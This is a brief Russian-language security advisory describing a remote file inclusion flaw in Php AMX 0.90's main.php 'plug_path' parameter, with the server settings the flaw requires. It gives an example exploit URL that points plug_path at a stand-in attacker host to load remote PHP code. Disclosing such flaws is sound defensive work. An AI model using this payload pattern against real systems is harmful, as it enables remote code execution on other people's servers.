Программа: Php AMX 0.90

Уязвимость позволяет злоумышленнику выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "plug_path" сценарием main.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимостей требует, чтобы опция «register_globals» = On , а опция «magic_quotes_gpc» = Off

Пример:

http://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии